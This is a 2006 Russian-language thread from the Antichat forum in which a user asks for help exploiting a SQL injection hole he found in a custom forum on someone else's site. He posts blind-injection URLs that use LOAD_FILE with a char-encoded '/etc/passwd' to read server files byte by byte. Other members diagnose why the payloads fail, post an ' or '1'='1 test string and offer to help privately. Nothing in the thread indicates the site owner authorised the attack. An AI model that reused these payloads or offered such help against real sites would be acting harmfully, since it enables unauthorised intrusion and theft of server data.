ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу SQL-inj на самописном форуме
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj на самописном форуме
  #1  
Старый 14.11.2006, 21:34
Аватар для cop
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989

Репутация: 5
По умолчанию SQL-inj на самописном форуме
Нашел дырочку в одном из форумов, который судя по всему написан автором сайта.

Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd.

Вот как это выглядит:

Код:
view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*
Воспринимается подзапрос как ложь. Т.е. всеравно что бы я написал
Код:
view.php?forumid=1 AND 1 = 0 /*
уже пробовал и так

Код:
view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*
всеравно не срабатывает.

ЧТо может быть с этим оператором LOAD_FILE ?

Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции.
Последний раз редактировалось cop; 14.11.2006 в 21:38..
 
Ответить с цитированием

  #2  
Старый 14.11.2006, 23:09
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Он может быть отключен или у тебя нету прав.
 
Ответить с цитированием

  #3  
Старый 14.11.2006, 23:34
Аватар для cop
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989

Репутация: 5
По умолчанию
Можно как-то проверить какие права у пользователя?
 
Ответить с цитированием

  #4  
Старый 15.11.2006, 00:14
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию
Функция Load_file() выключена на бесплатном хостнинге
 
Ответить с цитированием

  #5  
Старый 15.11.2006, 00:35
Аватар для cop
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989

Репутация: 5
По умолчанию
а причем здесь бесплатный хостинг?
 
Ответить с цитированием

  #6  
Старый 15.11.2006, 00:59
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
view.php?forumid=1'+or+'1' ='1/*
тести если выведет тоже самое то есть inj
 
Ответить с цитированием

  #7  
Старый 15.11.2006, 01:42
Аватар для cop
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989

Репутация: 5
По умолчанию
Та это уже прошел, там есть возможность инъекции...
 
Ответить с цитированием

  #8  
Старый 15.11.2006, 02:24
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Стучи в асю посмотрю.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ